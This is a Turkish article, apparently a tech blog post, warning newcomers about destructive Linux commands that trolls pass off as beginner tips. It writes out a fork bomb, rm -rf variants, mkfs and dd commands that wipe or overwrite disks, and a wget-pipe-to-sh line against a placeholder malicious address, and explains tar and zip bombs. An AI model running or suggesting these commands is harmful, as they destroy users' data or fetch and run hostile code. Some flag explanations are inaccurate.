Linux çekirdeğinin bu özelliği onu etkin kullanmaya yardımcı olduğu gibi Rus ruletinden harmanlı, tehlikeli bir oyuna dönüştürebiliyor.
Aşağıda göreceğiniz Linux komutları troller tarafından “Yeni başlayanlar için tavsiye edilen linux komutları” adı altında gariban kullanıcıları troll’lemek için kullanıyor.
Biz ise “nimetle ve komut satırıyla şaka olmaz!” düşüncesinden yola çıkarak; en tehlikeli, daha doğrusu dikkat edilmesi gereken Linux komutları ve kodlarına değineceğiz.
Eğer macera arıyorsanız ve bu kodların ne gibi sonuçlar doğurabileceği hakkında bir fikriniz yoksa lütfen bızıklamayın.
Beni oku (okumasan da olur): Bu listede belirtilen komutların hepsi bilgisayarınızda veri kaybına yol açabilir. Bazı komutlar doğrudan çalıştırılabileceği gibi bazı komutlar (örneğin Ubuntu) sadece bir ön ek (prefix olarak sudo) ile kullanıldığında zararlıdır. Kimilerinin ise etkili olması için root yetkisine ihtiyaç duyulabilir.
01 - Linux Fork Bombası Komutu
:(){ :|: & };:
Hemen yukarıda görmüş olduğunuz kod, Fork Bomb adıyla bilinen bir DOS (Denial of Service Attack) komutudur. Esasında bir bash fonksiyonu olan kodu Linux sistemde çalıştırdığınızda, sistem komutu birden fazla defa tekrar eder ve bu süreç sistem donana kadar devam eder.
Linux bir sistemde Fork Bomb kodu çalıştırıldığında sonsuz döngüden paçayı sıyırmanın tek yolu sistemin yeniden başlatılmasıdır.
02 - mv folder/dev/null Komutu
mv folder/dev/null bir başka ateşten maşa komuttur. Dev/null; Unix türevi işletim sistemlerinde aygıtlar dizininde bulunan (/dev) bir stream dosyasıdır.
Bu belgeye yazılan her tür ve herhangi miktarda olan veriyi sistem yok sayar ve yazan işleme EOF gönderilir. Bu açıdan /dev/null bir kara deliğe benzetilir.
03 - rm -rf Komutu
rm -rf komutu bir klasör ve klasördeki dosyaları silmek için Linux sistemlerde kullanılan komuttur. Eğer bu komutu nasıl kullanacağınızı bilmiyorsanız, farkında olmadan elinizi yakabilecek bir ateşle oynuyor olabilirsiniz.
Bu komutun en çok kullanılan kombinasyonlarından bazıları şunlardır:
- rm: Linux sistemdeki herhangi bir dosyayı silmek için kullanılır.[*]rm -f: Sadece okuma iznine sahip dosyaları siler.[*]rm -r: Komut, bir klasörün içeriğini yinelemeli olarak siler.[*]rm -d: Bu komut, bir boş klasörü silmek için kullanılır; ancak boş değilse dizini kaldırmayı reddeder.[*]rm -rf/: Bir dosyayı veya klasörü zorla silmek için kullanılır. Silinmek istenilen klasör veya dosyalar yazmaya karşı korumalı olsa da (sistem dosyaları dahil) birçok dosya ve dizini silebilir.[*]rm -rf*: Mevcut dizinin tüm içeriğini alt dizinleri dahil zorla silmek için kullanılır. Silinecek dosyaların yazmaya karşı korumalı olması, bu komutun dosyaları silmesini engelleyemez.[*]rm -rf.: Bir dizindeki tüm içeriği klasörler ve alt dizinler dahil silmek için kullanılır.
04 - mkfs Komutu
Mkfs komutu eğer tam olarak nasıl çalıştığını bilmiyorsanız sisteminiz için zararlı olabilir.
Mkfs komutundan sonra yazılan her şey formatlanır ve boş Linux dosya sistemine dönüştürülür.
Aşağıda belirtilen tüm komutlar sabit diskleri biçimlendirmek için kullanılır ve yönetici iznine ihtiyaç duyar:
- mkfs[*]mkfs.ext3[*]mkfs.bfs[*]mkfs.ext2[*]mkfs.minix[*]mkfs.msdos[*]mkfs.reiserfs[*]mkfs.vfat
mkfs.cramfs komutu da yukarıdaki komutlarla aynı işleve sahip, fakat onu yukarıdaki örneklerin yerine burada görmenizin bir sebebi var: Baya asabi bir komut olan mkfs.cramfs, yönetici yetkisine ihtiyaç duymaksızın çalıştırılabilir.
05 - Tar Bombası
Tar komutu, birçok dosyayı birleştirerek tek bir dosya halinde sıkıştırılmış arşiv ögeleri oluşturmak için kullanılır. Son derece faydalı bir komut olmasına rağmen artniyetli kişiler Tar komutunu kullanarak bir Tar bombası oluşturabilirler.
Tar bombası şeklinde hazırlanmış bir dosyayı çalıştırdığınızda, dosya çalıştırdığınız dizine yüzlerce ve milyonlarca kopyasını çıkartmaya çalışır. Bu komik şakadan veya ciddi saldırıdan korumak için indirdiğiniz Tar dosyalarına karşı dikkatli olmanız ve mümkünse Tar dosyasını korunaklı bir dizine çıkarmanız (protective directory) tavsiye edilir. Aksi halde milyonlarca kopyayı ayıklamak veya işletim sisteminizi yeniden kurmak zorunda kalabilirsiniz.
06 - dd Komutu
dd komutu, bir harddisk bölümünü kopyalamak ve dönüştürmek için kullanılır. Normalde oldukça hayırsever bir komut olmasına rağmen dd komutunu yanlış hedef adresleriyle kullanmak, sistem üstünde korkunç sonuçlara yol açabilir.
dd komutunun bazı Rus ruletimsi kullanım şekilleri şunlardır:
- dd if=/dev/hda of=/dev/hdb[*]dd if=/dev/hda of=/dev/sdb[*]dd if=something of=/dev/hda[*]dd if=something of=/dev/sda
07 - Shell Script Kodu
Linux kullanan şakacı arkadaşlarınız varsa Shell Script koduyla başınıza hiç olmadık işler açabilirler. Sizden basit bir Shell script dosyasını indirip, sisteminizde çalıştırmanızı isteyen bir arkadaşınız varsa arkadaşlığınızı sorgulamaya başlayabilirsiniz…
Bazı Shell Script kodları içerisinde zararlı kod parçacıkları içerebilirler. Eğer bir Shell Script kodunun içinde wget http://zararli_kaynak_adresi -O- | sh gibi bir komut görüyorsanız dosyayı çalıştırmayın.
Bu tür kod satırlarındaki wget bir dosyayı indirirken, sh ise indirilen dosyanın çalıştırılmasını sağlayacaktır.
08 - Tehlikeli Kaynak Kodlar
Biri size basit bir kaynak kodu verip bu kodu derlemenizi (compile) istiyorsa, yine arkadaşlığınızın gidişatını tekrar düşünmek isteyebilirsiniz.
Bazı kaynak kodlar ilk bakışta son derece basit bir kaynak kod gibi görünürken içine ustalıkla yerleştirilmiş zararlı kod parçacıkları içerebilir.
Bu kodlar, sisteminize ciddi zarar verebilir ve başınızda fabrikasyon çoraplar üretebilir. Kendi sisteminizde herhangi bir kaynak kodu compile etmeden önce, kaynağın güvenilirliğini sorgulamayı alışkanlık haline getirmelisiniz.
09 - Dekompresyon Bombası (Zip Bomb)
Ayıklama bombası veya Zip Bomb olarak kayıtlara geçen bu saldırı türünün hala örneklerine çeşitli internet sitelerinden erişilebiliyor. Bu sıkıştırılmış arşiv dosyaları yalnızca birkaç Kb büyüklüğünde görünüyor. Asıl eğlence dosyayı ayıklamak istediğinizde ortaya çıkıyor.
Katmanlı olarak ve yüksek oranda sıkıştırılarak hazırlanan Zip Bomb dosyaları, açmaya çalıştığınız anda diskinizi yüzlerce GB’lık veri yığınıyla doldurmaya başlıyor. Bir Zip bombasından kaçınmanın en iyi yolu ise küçük boyutlu ve güvenilmeyen kaynaklardan indirilen arşiv dosyalarına karşı ihtiyatlı olmak.
Bunlar en bilinen örnekler olmasına karşın Rus ruleti kadar tehlikeli daha birçok komutun Linux dünyasında kullanıcılarını beklediğini unutmayın :)
“İşi temelden kapayım en iyisi!” diyenler için bkz: